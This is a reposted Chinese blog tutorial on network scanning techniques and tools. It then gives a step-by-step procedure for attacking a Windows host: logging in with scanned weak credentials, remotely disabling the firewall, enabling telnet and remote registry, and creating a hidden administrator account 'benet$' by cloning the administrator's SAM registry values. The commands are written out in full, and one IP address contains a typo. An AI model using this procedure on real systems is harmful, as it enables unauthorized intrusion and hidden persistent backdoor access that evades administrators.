第2章-扫描技术
一、扫描技术概述
描描指的是利用工具软件来探测目标网络或主机的过程,其目的只有一个:为即将采取的攻击或防御行动收集情报
(1)、扫描原理
1、ping检测
Øping命令是最常用的网络连接诊断工具,当然也可作为最基础的扫描工具
Ø利生ICMP协议的响应机制,可以对目标IP地址、主机在线情况、操作系统类型等信息作出初步判断
【ping来判断目标主机的操作系统情况】
a)TTL值趋近于128:windows XP/windows server 2000/windows server 2003
b)TTL值趋近于64 :windows 7/windows 2008
c)TTL值趋近于255:交换机、路由器等设备
如下图所示
<a target="_blank" href="http://blog.51cto.com/attachment/201307/124946212.jpg"></a>
2、端口扫描
Ø主要针对特定的网络服务进行探测,尝试连接目标主机的特定端口,根据反馈结果来判断是否开启指定服务
Ø分类:TCP端口扫描、UDP端口扫描
【TCP端口扫描】
会向对方发送一个请求或终止访问的数据包,若对方给出正常回应,则表示目标服务开启,否则表示端口关闭或可能被防火墙拦截
【UDP端口扫描】
通常会发送一个空数据包,若反馈错误消息,则表示目标服务开启,否则会告知端口不可达
【命令格式】
telnet ip地址端口号如“telnet 192.168.4.17 21”
<a target="_blank" href="http://blog.51cto.com/attachment/201307/124957411.jpg"></a>
3、OS探测
Ø也就是操作系统(Operating System)探测,指的是获取目标主机所使用的操作系统类型,版本等相关信息的过程
Ø探测试式:随便访问一个不存在的网页,通常能够在出错页面上得到web服务程序的版本信息
<a target="_blank" href="http://blog.51cto.com/attachment/201307/125004795.jpg"></a>
4、弱口令探测
Ø弱口令探测的方式类似于暴力破解,只不过并不尝试所有可能的密码,而只是尝试安全性极差的密码,如“abc123、123456”等
5、漏洞评估
Ø漏洞评估(或称弱点评估),一般用在正面的系统安全加固工作中,主要针对服务器系统各种已知的漏洞进行检测,同时对各种公认的或潜在的见险进行摸拟,从而全面判断目标主机的安全性
Ø漏洞评估通常由一系列独立的扫描插件来执行,而并不是单一的扫描任务
(2)、常见的扫描工具
1、SuperScan
一款免费的TCP/UDP端口扫描工具,网址“www.foundstone.com”
2、Fluxay(流光)
由国内的“小榕软件实验室”开发的一款强大的集成扫描软件,网址“www.netxeyes.com”
3、X-Scan
由国内的“安全焦点”出品的漏洞检洞工具,网址“www.xfocus.net”
4、MBSA
MBSA全称“Microsoft BaselineSecurity Analyzer”微软基准安全分析
器,由微软公司开发的一款免费的操作系统安全评估工具,网址“www.microsoft.com”
5、Wikto
在Windows平台运行的Web弱点扫描工具,采用C#语言编写,网址
“www.sensepost.com”
二、创建隐藏用户的方法
本案例是用在被攻击者主机上创建,也可在自己的主机上创建
1、用扫描工具获取到对方的账户和密码
2、用获取到的账户和密码先进入系统(假如对方IP为192.168.10.10,扫描到的密码为123456)
net use \\1962.168.10.10 /user:administrator 123456
3、远程关闭对方的防火墙
sc \\192.168.10.10 stop sharedaccess
4、远程开启对方的远程服务
sc \\192.168.10.10 start tlntsvr start= auto
sc \\192.168.10.10 start tlntsvr
5、远程开启对方的注册表服务
sc \\192.168.10.10 config remoteregistry start= auto
sc \\192.168.10.10 start remoteregistry
6、远程登录系统
telnet 192.168.10.10
7、创建隐藏用户(假如取名为benet)
net user benet$ 123456 /add
8、打开本地注册表(regedit)
选择“文件”→→选择"连接到网络注册表"→→输入“对方IP:192.168.10.10”→→点击进入
9、赋予完全控制权限并编辑注册表
HKEY_LOCAL_MACHINE→SAM→SAM→Domain→Account
users:权限(F)、功能(V)在这个选项里
Names:账户在这个选项里
把管理员权限(ox1-F4)“0000001F4”复制给benet用户(0x3eb)“0000003EB”
10、在导出benet用户的“Names”和“Users”
说白了就是做个备份,导入位置随便哪都行
11、远程删除benet用户
net user benet$ /del
12、最后,在导入刚才导出的benet用户
13、隐藏用户创建成功
《注意》:如果是在本地创建的话,前面6步就可以省略,直接从第7步开始
本文转自甘兵 51CTO博客,原文链接:http://blog.51cto.com/ganbing/1258688,如需转载请自行联系原作者